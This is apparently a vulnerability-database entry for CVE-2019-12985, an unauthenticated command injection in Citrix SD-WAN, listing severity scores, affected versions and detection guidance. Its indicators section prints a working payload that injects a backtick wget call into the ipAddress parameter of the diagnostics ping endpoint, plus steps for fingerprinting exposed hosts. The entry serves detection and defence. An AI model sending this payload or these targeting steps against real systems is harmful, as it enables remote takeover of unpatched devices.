cbcvebase.
CVE-2019-12985
published 2019-07-16

CVE-2019-12985: Citrix SD-WAN 10.2.x before 10.2.3 and NetScaler SD-WAN 10.0.x before 10.0.8 have Improper Input Validation (issue 1 of 6).

PriorityP187critical9.8CVSS 3.0
AVNACLPRNUINSUCHIHAH
ITWEXPLOITVulnCheck KEV
Exploited in the wild
EPSS
42.55%
98.5th percentile
Citrix SD-WAN 10.2.x before 10.2.3 and NetScaler SD-WAN 10.0.x before 10.0.8 have Improper Input Validation (issue 1 of 6).

Affected

6 ranges
VendorProductVersion rangeFixed in
citrixcitrix_sd-wan
citrixnetscaler_adc_gateway
citrixnetscaler_sd-wan>= 10.0 < 10.0.810.0.8
citrixsd-wan
citrixsd-wan>= 10.2 < 10.2.310.2.3
citrixxenserver

Detection & IOCsextracted from sources · hover to see the quote

urlPOST /Collector/diagnostics/ping
path/Collector/diagnostics/ping
commandipAddress=%60/bin/wget+http://{{interactsh-url}}%60
  • Detect exploitation attempts by monitoring POST requests to /Collector/diagnostics/ping containing shell metacharacters (backtick, semicolon, pipe) in the ipAddress, pingCount, or packetSize parameters.
  • Traffic is routed through the Collector controller endpoint; monitor for unexpected HTTP POST requests to /Collector/diagnostics/ping from unauthenticated or external sources.
  • Shodan/FOFA fingerprint for exposed Citrix SD-WAN Center instances: search for HTTP title 'Citrix SD-WAN' to identify attack surface.
  • Confirm exploitation via out-of-band HTTP interaction (OAST): a successful payload causes the target to issue an outbound HTTP request (e.g., via wget) to an attacker-controlled host.
  • Verify target is Citrix SD-WAN Center by checking that the login page body contains the string 'Citrix SD-WAN' before attempting the injection endpoint.
  • ·The vulnerability exists in Citrix SD-WAN 10.2.x before 10.2.3 and NetScaler SD-WAN 10.0.x before 10.0.8; detections should be scoped to these version ranges.
  • ·The injection point is specifically the ping function in DiagnosticsController; other diagnostic functions may not be affected by this specific issue.

CVSS provenance

nvdv3.09.8CRITICALCVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
nvdv2.010.0CRITICALAV:N/AC:L/Au:N/C:C/I:C/A:C
vulncheck9.8CRITICAL
CVEs like this are exactly what “Exploited This Week” covers.

Every Monday: what got weaponized or added to CISA KEV in the last seven days — each CVE cross-linked to its PoC, Nuclei template, and detection rule. Free, one email a week, unsubscribe in one click.